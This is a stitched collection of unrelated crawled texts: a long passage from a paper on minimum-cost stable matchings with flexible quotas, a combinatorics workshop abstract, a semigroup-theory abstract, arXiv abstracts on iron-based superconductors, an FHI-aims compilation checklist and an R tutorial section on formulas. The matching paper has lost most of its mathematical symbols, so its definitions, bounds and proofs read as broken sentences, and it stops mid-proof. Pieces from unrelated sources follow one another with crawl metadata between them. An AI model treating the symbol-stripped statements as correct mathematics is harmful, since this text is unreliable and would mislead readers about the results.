In this section, we first present the stable matchings in the classical single round setting and define the notation used in this paper. We then formally define the problem followed by discussing some properties of the stable extensions [8] in the two-round setting.
2.1 Classical stable matchings
We are given a set of agents (students, applicants, residents and so on) and a set of programs (schools / courses / colleges, posts, hospitals, and so on) . Each agent and program ranks an arbitrary subset (also called acceptable subset) from the other side in a strict order. This ranking of elements is called as the preference list of the element. An agent is acceptable to program if and only if is acceptable to . A program has an associated upper-quota denoted by . If prefers over , we denote it by .
Such an instance can be modelled as a bipartite graph such that if and only if and are mutually acceptable to each other. A matching in is an assignment of agents to programs such that each agent is matched to at most one program and a program is matched to at most many agents. Let denote the program that agent is matched to in and denote the set of agents matched to program in matching . If is unmatched in , we denote it by . We consider as a less-preferred choice for any when compared to any program in her acceptable subset. A program is called under-subscribed in if and fully-subscribed in if . In this setting, stability is defined as follows. [Classical stable matchings] A pair is a blocking pair w.r.t. the matching if and is either under-subscribed in or there exists at least one agent such that . A matching is stable if there is no blocking pair w.r.t. . It is well known that every instance of the stable matching problem admits a stable matching and it can be computed in linear time by the well-known Gale and Shapley [9] algorithm.
2.2 SMFQ problem setup
In the problem, we are given a set of agents and a set of programs , their preference lists and the cost associated with each program. We assume that the costs are integral. Our goal is to compute an -perfect stable matching that achieves the minimum cost. In our model there are no fixed quotas hence no program is under-subscribed. In fact some programs may have no agents assigned to them. We denote such programs as closed. We modify the definition of stability in our setting as follows and throughout the paper we refer to this notion of stability. [Stable matchings with flexible quotas] A pair is a blocking pair w.r.t. the matching if and there exists at least one agent such that . A matching is stable if there is no blocking pair w.r.t. . In literature, such a blocking pair is also considered as an envy pair and the matching is called envy-free. In the standard setting, an envy-free matching need not be stable but in our setting of flexible quotas, envy-free matchings are indeed stable. A stable matching in our setting is Pareto cost-optimal if no agent can be promoted (that is, matched to a higher-preferred program) without increasing the cost of the matching.
2.3 Stable extensions
In this section, we define the notion of stable extensions [8] and present some properties of largest stable extensions. Let denote the classical stable matching instance, that is, the bipartite graph along with the preference lists and quotas. Let be a stable matching in . A stable extension of is defined as follows. [Stable extension] Matching is an extension of if no agent matched in changes her matched program, that is, . An extension of is a stable extension if is stable. We note that in no unmatched agent forms a blocking pair with an under-subscribed program. If agent is unmatched in but matched in to program , then must be fully-subscribed in and the number of residents matched to in is larger than its initial quota.
Properties of largest stable extensions. Let be the set of agents that can be matched in a largest stable extension of . For the instance given in Fig. 1, if then . Gajulappali et al. [8] present a polynomial time algorithm to compute (denoted as the set in line 3, Fig. 1 [8]) and then match every agent in . Below, we present an equivalent algorithm (Algorithm 1) to compute the set . We use the notion of barrier as defined in [8] which is similar to the notion of threshold resident defined in [15]. Let be the set of agents unmatched in the given matching . Then . For every program , we prune the preference list of by deleting the edges of the form such that appears after Barrier() in ’s list. We denote this pruned graph after the for loop in line 5 as . We return the set as the set of agents who are not isolated in . We note the following properties of the set .
P1. For the stable matching , the set is unique. This is clear by observing that Barrier() for each is unique with respect to the stable matching .∎
Next we note that the set is independent of the stable matching but the set depends on a specific stable matching . In the instance in Fig. 1, we saw that if then but if then . We show the following property about the largest stable extensions of different stable matchings.
P2. In the Type A1 setting [8], among all the stable matchings in the first round, the agent-optimal matching achieves the largest stable extension.∎
To prove P2, it is enough to show that the agent-optimal stable matching has the largest set . Let be the agent-optimal stable matching. Then for any stable matching , .
Proof.
Suppose for the contradiction that, . Let and be the pruned graphs after for loop in line 5 in Algorithm 1 w.r.t. and respectively. Thus there exists an agent ; that is, agent has degree at least one in but degree in . Let . Thus, there exists agent such that . But since , we have . But the agent-optimality of implies that for every agent . This contradicts that . Hence, . ∎
We also note the following stronger property about .
P3. The set of edges deleted in is a superset of set of edges deleted in the pruned graph of any other stable matching .∎
To see P3, observe that for agent , . Thus, if Barrier() in then Barrier() in . Thus, . We can generalize P2 as follows.
P4. If the underlying sets are and and if quotas for elements in set are increased in the second round, then -optimal stable matching achieves the largest stable extension.∎
Computing a largest min-cost stable extension. In addition to the initial quotas if the programs also specify the costs then in the second round of Type A1 setting [8], a largest min-cost stable extension is given by an optimal solution to the following instance - The set of programs remain the same. The set of agents is same as the set and the preference lists are restricted to the subset of edges in .
2.4 Our techniques
We note that a simple lower bound on an optimal solution of exists, which is computed by summing up the cost of a least-cost program appearing in every agent’s preference list. We use this lower bound for the -approximation algorithms and show that the analysis of our algorithms is tight. We also present a weaker lower bound for using an auxiliary problem and derive a
-approximation algorithm using it. We present a linear program for the
problem and use LP rounding for the restricted case when agents have short preference lists.
3 Algorithmic results
In section 3.1, we present a fast exponential algorithm for the problem when the number of distinct costs in the instance is small. In section 3.2 we first present an approximation algorithm with guarantee using a new auxiliary problem. Then we present two simple approximation algorithms that have the same approximation guarantee of where is the length of longest preference list of a program. These algorithms work on arbitrary instances. In section 3.3, we present a -approximation algorithm for the restricted instances where the agent’s preference list has programs.
3.1 Exact exponential algorithm for SMFQ
In this section we present an exact exponential algorithm for with running time where is the maximum number of distinct costs that appear in an agent’s preference list. Let be the number of distinct costs in the given instance and let be the set of distinct costs. Then . Also where is the maximum length of an agent’s preference list. Our algorithm (Algorithm 2) considers every possible -tuple of costs such that each for some . Thus, there are tuples. For each tuple, the algorithm constructs a sub-graph such that every agent has edges incident to programs with cost exactly . For any agent if is the highest preferred program neighbouring in then any program in the graph cannot be matched with any agent . The algorithm prunes the graph to remove such edges repeatedly. If an agent is isolated after the pruning, the current tuple is discarded. Otherwise, the algorithm matches every agent to the top choice program in this pruned graph. The algorithm picks a least-cost matching among the matchings computed for the non-discarded tuples and returns .
Correctness. First note that for tuple , if an agent has degree after the pruning of (line 12) then no matching is computed for . In this case we say that is invalid, otherwise is valid. Algorithm computes a matching for each valid tuple and the min-cost matching among these is returned. Consider the cost tuple where each agent’s cost corresponds to the cost of top choice program in her list in . When the algorithm processes this tuple, it will result in the graph such that no deletions happen in line 10. Thus, there is at least one valid tuple and hence, Algorithm 2 computes at least one -perfect matching. The matching computed by Algorithm 2 is stable.
Proof.
The matching is actually matching computed for some valid tuple. Thus, it is enough to show that computed for an arbitrary valid tuple is stable.
Suppose is not stable, then there exists agents such that and and . If at line 13 then , a contradiction. Hence, . If after line 3 then note that edge is deleted at line 10. Otherwise, was deleted in some iteration of the edge deletion loop. This implies that there exists that triggered this deletion. But, then we have that , implying that is also deleted. Thus, in both the cases, and hence . This contradicts the assumption that and hence completes the proof. ∎
Thus we showed that the algorithm computes at least one -perfect, stable matching. We now show that the algorithm computes the min-cost (optimal) matching.
Let be an -perfect stable matching and be the tuple corresponding to . Then no edge in is deleted when Algorithm 2 processes .
Proof.
Suppose for the sake of contradiction that an edge in is deleted when Algorithm 2 processes the tuple . Let be the first edge in that gets deleted during the course of the algorithm. The edge is in after line 3 since has the same cost as given by the tuple . This implies that the edge is deleted while pruning the instance. Suppose agent caused the deletion of edge at time . Let . Then it is clear that either or , otherwise is not stable. But since triggered the deletion of , the top choice program adjacent to in at time is less preferred than . Again note that after line 3 hence must have been deleted at time earlier than . This contradicts the assumption that is the first edge in that gets deleted. This completes the proof. ∎
Thus, when the algorithm processes the tuple corresponding to an -perfect stable matching, every agent has a degree at least at line 12, that is, that tuple is valid. Thus, the tuple corresponding to an optimal matching is also valid and hence Algorithm 2 computes matching for it. Since Algorithm 2 returns the matching with cost at most the cost of , it implies that it returns a min-cost -perfect stable matching.
Running Time. Algorithm 2 processes tuples. For each tuple it computes the graph in time, where is the number of edges in . The while loop can be efficiently implemented by keeping track of the most-preferred program considered so far for every agent. The while loop thus takes time because it deletes edges. Matching can be computed in time . Hence the Algorithm 2 runs in time .
This establishes Theorem 1.
3.2 Approximation algorithms for arbitrary SMFQ instances
In this section, we present two approximation algorithms for arbitrary instances. The first algorithm has an approximation guarantee of . The next two approximation algorithms have a guarantee of where is the length of longest preference list of a program.
3.2.1 |P|-approximation
In this section we present an approximation algorithm for with ratio . We define an auxiliary optimization problem and present a polynomial time algorithm for . We then claim a lower bound and an approximation guarantee using the optimal solution of .
The problem. We are given an instance of . In problem, our goal is to compute an -perfect stable matching that minimizes the maximum cost spent at a program. Recall that in the problem, our goal is to compute an -perfect stable matching with minimum total cost.
Now we show that is in . See Algorithm 3. We start with an empty matching . Since costs can be , the minimum cost spent at a program can be . If is the maximum cost in , then any -perfect matching has cost at most . We start with the range where and . Let . We set upper-quotas at every program such that the maximum cost spent at a program is . We then compute a stable matching using Gale and Shapley [9] algorithm. If is not -perfect then we search for the optimal cost value in the range . Otherwise, we set upper-quotas at every program such that maximum cost spent at a program is at most and compute a stable matching . If is not -perfect then we return , otherwise we search for the optimal cost value in the range . We prove the correctness of the algorithm below.
The matching computed by Algorithm 3 is -perfect and stable.
Proof.
By line 6 and line 7, the claim follows. ∎
Suppose is the maximum cost spent at a program in an optimal solution of . Let be the instance in which every program has maximum upper-quota that can be fulfilled in cost at most , that is, the maximum cost spent at a program is . Then, for are infeasible instances of and are feasible instances of .
The matching computed by Algorithm 3 is an optimal solution.
Proof.
The claim follows from Remark 3.2.1 since Algorithm 3 computes the matching by binary searching over the range . ∎
Running time. Since it uses binary search, it takes iterations. In each iteration it sets the quota in time, computes at most two stable matchings in time and a performs a constant number of operations, thus every iteration takes where is the number of edges in the underlying bipartite graph of the instance. Thus, the algorithm runs in time .
-approximation for . Suppose is the cost of optimal solution of , that is, there exists an -perfect stable matching in such that is the maximum cost spent at a program in and for every , there does not exist a stable -perfect matching where cost spent at every program is at most . Then we show that is a lower bound on the cost spend in an optimal solution of (Claim 3.2.1). Using this lower bound, we show the approximation guarantee of for the output of Algorithm 3 for (Claim 3.2.1).
The cost of an optimal solution of is at least .
Proof.
Suppose for the sake of contradiction that cost of the optimal solution of is . Note that is an -perfect stable matching, implying that is a feasible solution for . Also note that has the total cost which is the summation of costs spent at every program. Thus, the cost spent at any program in is at most , implying that the maximum cost spent at a program in is at most . This implies that itself is an optimal solution for , contradicting that is the maximum cost spent at a program in an optimal solution of . ∎
Let be the instance of . Matching computed by Algorithm 3 on is an -approximation of on .
Proof.
Let be an optimal solution of . Matching computed by Algorithm 3 is -perfect and stable. Let be the maximum cost spent at a program in . Thus the total cost of matching is at most . By the claim 3.2.1, , thus is an -approximation for . ∎
This establishes Theorem 1 a.
Remarks about Algorithm 3. We note that the actual total cost of the optimal matching of is at most where is the number of programs that are open. Since , the analysis is not tight with respect to the factor . However consider the instance in Example 3.2.1 where the total cost of optimal matching of is exactly . Suppose there are 3 agents and programs . Cost of is and that of is . Preference lists are shown below. It is clear that the optimal solution for is with cost . The optimal solution of is with cost . The number of open programs in is and the total cost of is .
3.2.2 ℓp-approximation
In this section we present two linear time algorithms denoted by ALG1 and ALG2 for the problem. We show that both the algorithms have an approximation guarantee of , where denotes the length of the longest preference list of any program. We show that there exist simple examples where one of them is better that the other. Hence, in practice, we run both the algorithms and output the matching that has minimum cost amongst the two. For our algorithms we need the following definition. Let denote the least cost program in the preference list of agent . If there is more than one program with the same minimum cost, we let be the most-preferred amongst these programs.
Description of ALG1: Given an instance , we construct a subset of such that iff for some agent . Our algorithm now matches every agent to the most-preferred program in . The pseudo-code can be found in Algorithm 4.
Analysis of ALG1: It is clear that the matching computed by ALG1 is -perfect. Let be the output of ALG1 and be an optimal matching. Let and be the cost of matching and respectively. It is easy to see that
c(OPT)≥∑a∈Ac(p∗a)
We show the correctness and the approximation guarantee of ALG1 via Lemma 3.2.2 and Lemma 3.2.2.
The output of ALG1 is stable.
Proof.
We show that no agent participates in a blocking pair w.r.t. . Recall that no program is under-subscribed w.r.t. . Thus if blocks , it implies that and there exists an agent such that . Since ALG1 assigns agents to programs in only, it implies that . However, is the most-preferred program in and hence . Thus, the claimed blocking pair does not exist. ∎
The output of ALG1 is an -approximation.
Proof.
In the matching , agent is either matched to or for some other agent . This is determined by the relative ordering of and in the preference list of . We partition the agents as , where is the set of agents matched to their own least cost program, that is, iff . We define . We can write the cost of as follows:
We now observe that any program that is a least cost program for some agent in can be matched to at most many agents from . Thus, the cost of is upper bounded as follows:
c(M) ≤ ∑a∈Ac(p∗a)+∑a∈A(ℓp−1)⋅c(p∗a) = ∑a∈Aℓp⋅c(p∗a) ≤ ℓp⋅c(OPT)
This proves the approximation guarantee. ∎
We now present our second algorithm.
Description of ALG2: Given an instance , ALG2 starts by matching every agent to . Note that such a matching is -perfect and min-cost but not necessarily stable. Now the algorithm considers programs in an arbitrary order. For program , we consider agents in the reverse preference list ordering of . Note that if there exists agent such that and there exists such that , then envies and forms a blocking pair. We resolve this by promoting from to . The algorithm stops when we have considered every program. The pseudo-code can be found in Algorithm 5.
We observe the following about ALG2. An agent only gets promoted in the loop at line 5 of the algorithm. Further, a program is assigned agents only when it is being considered in the for loop at line 2. Finally, if a program is assigned at least one agent in the final output matching, then for some agent .
Before presenting the correctness and approximation guarantee of ALG2, we present following instances which illustrate neither of the two algorithms is strictly better than the other.
Let , , where is some large positive constant. The agents have the same preference list followed by . Whereas agent has only in its preference list. The preferences of the programs are as given below.
p1 :a1, a2, …, an−1 p2 :an, an−1, an−2, …, a1
Here, ALG1 outputs of cost where . In contrast, ALG2 outputs whose cost is . Clearly, ALG2 outperforms ALG1 in this case and in fact is optimal for the instance.
Let , , where is some large positive constant. The preferences of agents are followed by followed by . The preference list of contains only and the preference list of contains only . The preferences of programs are as shown below.
p1 :a1, a2, …,an−2 p2 :an−1, a1, a2, …,an−2 p3 :a1, …, an−2, an
Here, ALG1 outputs whose cost is . In contrast, ALG2 outputs of cost where . In this instance ALG1 outperforms ALG2 and it can be verified that is the optimal matching.
Analysis of ALG2: It is clear that the matching computed by ALG2 is -perfect. We show the correctness and the approximation guarantee of ALG1 via Lemma 3.2.2 and Lemma 3.2.2. The matching output by ALG2 is stable.
Proof.
Let be the output of ALG2. We show that no agent participates in a blocking pair w.r.t. . Assume for contradiction, that blocks . Then and there exists an agent such that . Consider the iteration of the for loop in line 2 when was considered. Either was already matched to (before this iteration) or is assigned to in this iteration. Note that prefers over and the agents are considered in reverse order of ’s preferences. Thus if was matched in that iteration to a lower-preferred program than , then must be promoted to . Otherwise, was already matched in that iteration to a better-preferred program. Since agents can only get promoted in subsequent iterations, it contradicts that at the end of the algorithm, agent prefers to . This completes the proof of stability. ∎
The matching output by ALG2 is an -approximation.
Proof.
The proof is similar to the proof of Lemma 3.2.2. Let be the cost of matching output by Algorithm 5. The lower bound on is exactly the same. In the matching , some agents are matched to their least cost program (call them ), whereas some agents get promoted (call them ). However, as noted earlier, if a program is assigned agents in then it must be for some agent . Thus for agent who is not matched to its own least cost post, we charge the cost of some other least cost post . Since a least cost post can be charged at most times by agents in , by a similar argument as in Lemma 3.2.2 we get the approximation guarantee of . ∎
This establishes Theorem 1 b.
Remarks about Algorithms ALG1 and ALG2. We note that our analysis of ALG1 and ALG2 is tight by giving the following example on which both algorithms compute an exact -approximation. Suppose there are agents and programs . Cost of is and cost of and is . Preference lists are shown below.
a1 :p0 p1 ⋮ :⋮ ak :p0 p1 a :p0 p2
p0 :a1 …ak a p1 :a1 …ak p2 :a
Algorithm ALG1 and ALG2 both compute matching that has cost of and the optimal matching has cost . Note that . We also note that both our algorithms compute Pareto cost-optimal matchings.
3.3 Approximation algorithms for short preference lists of agents
We consider the instance of where agents have preference lists of length exactly two. This instance is -hard as can be seen from Theorem 1. We give a simple deterministic LP rounding algorithm for this case that achieves a -approximation. We have an LP variable for every edge in the underlying bipartite graph. Consider the following linear program for computing a min-cost -perfect stable matching. Since the upper quotas are not fixed, for stability it is enough to have the following - If a program is matched to an agent then every agent must be matched to a program at least as preferred as by . This is captured by the first constant (Eq. 2). The second constraint (Eq. 3) captures that the desired matching is -perfect and the third constraint (Eq. 4) is a non-negativity constraint on LP variables. The objective (Eq. 1) is to minimize the cost of the matching, computed as a sum over all programs , the cost multiplied by the number of agents matched to .
minimize
∑p∈Pc(p)⋅⎛⎝∑(a,p)∈Exa,p⎞⎠ (1)
subject to
∑p′≥a pxa,p′ ≥ xa′,p ∀(a,p)∈E,a′
Deterministic rounding. Suppose is an LP optimal solution. We construct a matching as follows. Initially . For every agent , we do the following - Let and be the two programs in the preference list of agent in that order. If then we add to , otherwise we add to .
Matching is -perfect and stable.
Proof.
For every agent , it is guaranteed (by Eq. 3) that either or . Thus, every agent is matched in .
Now we show that is stable. For contradiction, assume that blocks . This implies that there exists an agent such that and . Let . Since | 2021-07-26 04:46:04 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8271313905715942, "perplexity": 638.5299791604507}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046152000.25/warc/CC-MAIN-20210726031942-20210726061942-00343.warc.gz"} |
http://math.sjtu.edu.cn/Conference/2015WCA/talk.php?ZhuYan | 2015 Workshop on Combinatorics and Applications at SJTU
April 21 -- 27, Shanghai Jiao Tong University
Date: Tuesday, April 21, 2015
Time: 11:45 - 12:15
Venue: Large Meeting Room, Math Building
Title: Tight Relative $2e$-Designs in Association Schemes
Abstract:
Relative $t$-designs is defined on Q-polynomial association scheme and we call it tight if it satisfies the Fisher type lower bound. We will mainly review some results about tight relative $2$-designs $(Y,w)$ on two shells $X_{r_1} \cup X_{r_2}$ in binary Hamming association scheme $H(n,2)$ and Johnson association scheme $J(v,k)$. The good feature of $H(n,2)$ is that the distance set $\{ \alpha_1,\alpha_2,\gamma \}$ and $\frac{w_2}{w_1}$ are uniquely expressed in terms of $n,r_1,r_2,N_{r_1}$. This implies coherent configuration is attached to $Y$. (However, for $J(v,k)$, this property is difficult to prove in general .) There exist many tight relative $2$-designs in $H(n,2)$ with both constant weight and $w_2 \neq w_1$. So far, we are unable to find such designs with $w_2 \neq w_1$ in $J(v,k)$. Now we are working on the existence of tight relative $4$-designs on two shells in $H(n,2)$. In this case, we can not determine all the feasible parameters. But it is proved that $Y \cap X_{r_i}, i=1,2$ should be combinatorial $3$-design. Finally this problem is related to the existence of some combinatorial designs. This is joint work with Eiichi Bannai and Etsuko Bannai.
Slides: View slides
Webmaster | 2019-12-11 06:03:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8223011493682861, "perplexity": 605.2498008729111}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540529955.67/warc/CC-MAIN-20191211045724-20191211073724-00148.warc.gz"} |
https://ftp.aimsciences.org/article/doi/10.3934/proc.2011.2011.963 | Article Contents
Article Contents
# Continuous maximal regularity and analytic semigroups
• In this paper we establish a result regarding the connection between continuous maximal regularity and generation of analytic semigroups on a pair of densely embedded Banach spaces. More precisely, we show that continuous maximal regularity for a closed operator $A$ : $E_1 \to E_0$ implies that $A$ generates a strongly continuous analytic semigroup on $E_0$ with domain equal $E_1$.
Mathematics Subject Classification: Primary: 35K90, 47D06; Secondary: 35K35.
Citation:
Open Access Under a Creative Commons license | 2023-03-21 17:24:50 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 1, "x-ck12": 0, "texerror": 0, "math_score": 0.3010075092315674, "perplexity": 439.41869746976454}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943704.21/warc/CC-MAIN-20230321162614-20230321192614-00578.warc.gz"} |
https://fhi-aims-club.gitlab.io/tutorials/scaling-in-fhi-aims/summary/ | Summary
To set up, run, and produce reproducible results on a supercomputer (actually, any machine) you should be aware of several fundamental aspects. These things will be summarized in the following, briefly.
Understanding the Supercomputer and its environment
• Get an overview of the supercomputer's architecture (number of nodes, number of CPUs per node, memory per node, type of CPUs, accelerators, walltimes, homogenous/inhomogenous node architecture)
• Which compilers and libraries are available on the computer systems and which ones might be appropriate to compile and link FHI-aims?
• How does the queuing (job submission) system work?
Compiling an optimized FHI-aims executable
• Find out, which libraries and compilers are available, including their versions. Unfortunately, some compiler and library combinations can contain bugs that are outside the control of the FHI-aims code itself. Check (at FHI-aims' wiki, located at https://aims-git.rz-berlin.mpg.de/aims/FHIaims/-/wikis/home) if issues are already known for some specific library/compiler versions you might be trying to use.
• Are the environments and available libraries the same during compiling the executable and running the executable? (The executable should be always compiled for the set of instructions available during execution.)
• Use compiler optimization flags (e.g. -O3 or AVX instruction sets).
• Run the FHI-aims regression tests for your new executable on your supercomputer. You can find them in the FHIaims/regression_tests/ folder. | 2022-06-26 07:24:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.487612247467041, "perplexity": 4790.354899543534}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103037649.11/warc/CC-MAIN-20220626071255-20220626101255-00385.warc.gz"} |
https://labs.tib.eu/arxiv/?author=N.%20R.%20Davies | • Spin resonance in the superconducting state of Li$_{1-x}$Fe$_{x}$ODFe$_{1-y}$Se observed by neutron spectroscopy(1607.05588)
Oct. 25, 2016 cond-mat.supr-con
We have performed inelastic neutron scattering measurements on a powder sample of the superconductor lithium iron selenide hydroxide Li$_{1-x}$Fe$_{x}$ODFe$_{1-y}$Se ($x \simeq 0.16, y \simeq 0.02$, $T_{\rm c} = 41$\,K). The spectrum shows an enhanced intensity below $T_{\rm c}$ over an energy range $0.64\times2\Delta < E < 2\Delta$, where $\Delta$ is the superconducting gap, with maxima at the wave vectors $Q_1 \simeq 1.46$\,\AA$^{-1}$ and $Q_2 \simeq 1.97$\,\AA$^{-1}$. The behavior of this feature is consistent with the spin resonance mode found in other unconventional superconductors, and strongly resembles the spin resonance observed in the spectrum of the molecular-intercalated iron selenide, Li$_{0.6}$(ND$_{2}$)$_{0.2}$(ND$_{3}$)$_{0.8}$Fe$_{2}$Se$_{2}$. The signal can be described with a characteristic two-dimensional wave vector $(\pi, 0.67\pi)$ in the Brillouin zone of the iron square lattice, consistent with the nesting vector between electron Fermi sheets.
• Commensurate lattice distortion in the layered titanium oxypnictides Na$_{2}$Ti$_{2}Pn_{2}$O ($Pn =$ As, Sb) determined by X-ray diffraction(1604.07284)
Oct. 25, 2016 cond-mat.supr-con
We report single crystal X-ray diffraction measurements on Na$_2$Ti$_{2}Pn_{2}$O ($Pn$ = As, Sb) which reveal a charge superstructure that appears below the density wave transitions previously observed in bulk data. From symmetry-constrained structure refinements we establish that the associated distortion mode can be described by two propagation vectors, ${\bf q}_{1} = (1/2, 0, l)$ and ${\bf q}_{2} = (0, 1/2, l)$, with $l=0$ (Sb) or $l = 1/2$ (As), and primarily involves in-plane displacements of the Ti atoms perpendicular to the Ti--O bonds. The results provide direct evidence for phonon-assisted charge density wave order in Na$_2$Ti$_{2}Pn_{2}$O and identify a proximate ordered phase that could compete with superconductivity in doped BaTi$_{2}$Sb$_{2}$O.
• Suppression of orbital ordering by chemical pressure in FeSe1-xSx(1508.05016)
We report a high-resolution angle-resolved photo-emission spectroscopy study of the evolution of the electronic structure of FeSe1-xSx single crystals. Isovalent S substitution onto the Se site constitutes a chemical pressure which subtly modifies the electronic structure of FeSe at high temperatures and induces a suppression of the tetragonal-symmetry-breaking structural transition temperature from 87K to 58K for x=0.15. With increasing S substitution, we find smaller splitting between bands with dyz and dxz orbital character and weaker anisotropic distortions of the low temperature Fermi surfaces. These effects evolve systematically as a function of both S substitution and temperature, providing strong evidence that an orbital ordering is the underlying order parameter of the structural transition in FeSe1-xSx. Finally, we detect the small inner hole pocket for x=0.12, which is pushed below the Fermi level in the orbitally-ordered low temperature Fermi surface of FeSe.
• Emergence of the nematic electronic state in FeSe(1502.02917)
We present a comprehensive study of the evolution of the nematic electronic structure of FeSe using high resolution angle-resolved photoemission spectroscopy (ARPES), quantum oscillations in the normal state and elastoresistance measurements. Our high resolution ARPES allows us to track the Fermi surface deformation from four-fold to two-fold symmetry across the structural transition at ~87 K which is stabilized as a result of the dramatic splitting of bands associated with dxz and dyz character. The low temperature Fermi surface is that a compensated metal consisting of one hole and two electron bands and is fully determined by combining the knowledge from ARPES and quantum oscillations. A manifestation of the nematic state is the significant increase in the nematic susceptibility as approaching the structural transition that we detect from our elastoresistance measurements on FeSe. The dramatic changes in electronic structure cannot be explained by the small lattice effects and, in the absence of magnetic fluctuations above the structural transition, points clearly towards an electronically driven transition in FeSe stabilized by orbital-charge ordering. | 2021-04-11 09:27:42 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6254445314407349, "perplexity": 2225.329225657406}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038061820.19/warc/CC-MAIN-20210411085610-20210411115610-00502.warc.gz"} |
https://stats.libretexts.org/Bookshelves/Applied_Statistics/Book%3A_Learning_Statistics_with_R_-_A_tutorial_for_Psychology_Students_and_other_Beginners_(Navarro)/04%3A_Additional_R_Concepts/4.10%3A_Formulas | # 4.10: Formulas
The last kind of variable that I want to introduce before finally being able to start talking about statistics is the formula. Formulas were originally introduced into R as a convenient way to specify a particular type of statistical model (see Chapter15) but they’re such handy things that they’ve spread. Formulas are now used in a lot of different contexts, so it makes sense to introduce them early.
Stated simply, a formula object is a variable, but it’s a special type of variable that specifies a relationship between other variables. A formula is specified using the “tilde operator” #~#. A very simple example of a formula is shown below:62
formula1 <- out ~ pred
formula1
## out ~ pred
The precise meaning of this formula depends on exactly what you want to do with it, but in broad terms it means “the out (outcome) variable, analysed in terms of the pred (predictor) variable”. That said, although the simplest and most common form of a formula uses the “one variable on the left, one variable on the right” format, there are others. For instance, the following examples are all reasonably common
formula2 <- out ~ pred1 + pred2 # more than one variable on the right
formula3 <- out ~ pred1 * pred2 # different relationship between predictors
formula4 <- ~ var1 + var2 # a 'one-sided' formula
and there are many more variants besides. Formulas are pretty flexible things, and so different functions will make use of different formats, depending on what the function is intended to do.
